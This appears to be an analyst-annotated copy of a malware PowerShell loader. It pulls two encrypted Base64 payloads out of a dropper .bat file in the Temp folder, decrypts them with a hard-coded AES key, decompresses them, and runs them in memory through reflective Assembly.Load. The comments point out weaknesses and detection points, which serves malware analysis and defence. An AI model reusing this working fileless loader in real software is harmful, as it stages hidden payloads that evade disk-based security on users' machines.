#
# Function definitions
#
# Decrypts a byte[] with AES-CBC/PKCS7 using a key and IV that are hard-coded
# below as Base64 constants. Returns the plaintext byte[] on the pipeline.
# The whole buffer is passed to a single TransformFinalBlock call, so the input
# must be a complete ciphertext (a multiple of the 16-byte block size); otherwise
# the decryptor throws a CryptographicException.
# Analyst note: there is no MAC/authentication tag, and key and IV are static,
# so the embedded payloads can be recovered offline from the script alone.
function DecryptData($encrypted_data)
{
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC;
$aes.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
# Static 256-bit key (32 bytes after Base64 decoding) and 128-bit IV.
$aes.Key = [System.Convert]::FromBase64String('oD12rIBH5O47YPIVbw/sZwWBNiS4+zp/LUJPZd1RmG4=');
$aes.IV = [System.Convert]::FromBase64String('P4zzmImdAL7FZfVYUyJW5w==');
$decryptor = $aes.CreateDecryptor();
# Single-shot decryption of the entire input; padding is stripped here.
$decrypted_data=$decryptor.TransformFinalBlock($encrypted_data, 0, $encrypted_data.Length);
$decryptor.Dispose();
$aes.Dispose();
# Bare expression: PowerShell emits the byte[] as the function's output.
$decrypted_data;
}
# GZip-inflates a byte[] fully into memory and returns the decompressed byte[].
# Used on the output of DecryptData, i.e. the payload is stored as
# gzip(assembly) then AES-encrypted.
function DecompressData($compressed_data)
{
# The leading comma forces the byte[] to be passed as one constructor argument
# instead of being unrolled into individual bytes.
$compressed_stream = New-Object System.IO.MemoryStream(,$compressed_data);
$decompressed_stream = New-Object System.IO.MemoryStream;
$gzip_stream = New-Object System.IO.Compression.GZipStream($compressed_stream, [IO.Compression.CompressionMode]::Decompress);
$gzip_stream.CopyTo($decompressed_stream);
$gzip_stream.Dispose();
$compressed_stream.Dispose();
$decompressed_stream.Dispose();
# ToArray() is called after Dispose(); MemoryStream.ToArray() is documented to
# keep working on a closed stream, so this still returns the full buffer.
$decompressed_stream.ToArray();
}
# Loads a .NET assembly directly from a byte[] (in-memory, no file written) and
# invokes its entry point with the supplied argument array.
# $arguments is the object[] handed to MethodInfo.Invoke, so for a Main(string[])
# it must be an array whose single element is the string[] args.
# Analyst note: Assembly.Load(byte[]) called from PowerShell is a common
# reflective-loading pattern; script block logging and AMSI visibility of this
# call are the practical detection points, since the payload never hits disk.
function ExecuteAssembly($assembly_data, $arguments)
{
$assembly = [System.Reflection.Assembly]::Load([byte[]]$assembly_data);
$entrypoint = $assembly.EntryPoint;
# Static entry point: no instance, so the target object is $null.
$entrypoint.Invoke($null, $arguments);
}
#
# Entry point
#
# The payloads it loads are located in the .bat file
# Read the dropper .bat from the user's Temp folder and split it into lines.
# NOTE(review): Split receives a string here; on Windows PowerShell / .NET
# Framework that binds to Split(char[]) and splits on '\r' and '\n' separately,
# which yields extra empty lines but does not affect the search below.
$text = [System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);
foreach ($line in $text)
{
# The .bat file contained the code that drops the PowerShell script, and after
# the end of the script, on a line delimited by ":: ", there were 2 Base64-encoded payloads
if ($line.StartsWith(':: '))
{
# Drop the ":: " prefix; the two Base64 blobs are separated by a backslash.
$assembly_contents = [string[]]$line.Substring(3).Split('\');
# Only the first matching line is used.
break;
}
}
# Both payloads: Base64 -> AES-CBC decrypt -> GZip inflate -> raw assembly bytes.
# $assembly_contents is never checked for null or length, so a .bat without a
# ":: " line fails here with an indexing/parameter error.
$assembly1 = DecompressData(DecryptData([Convert]::FromBase64String($assembly_contents[0])));
$assembly2 = DecompressData(DecryptData([Convert]::FromBase64String($assembly_contents[1])));
# (, [string[]] ('')) builds an object[] holding one string[] with a single
# empty string, i.e. each assembly's Main receives args = @('').
ExecuteAssembly $assembly1 (, [string[]] (''));
ExecuteAssembly $assembly2 (, [string[]] (''));
#
#
#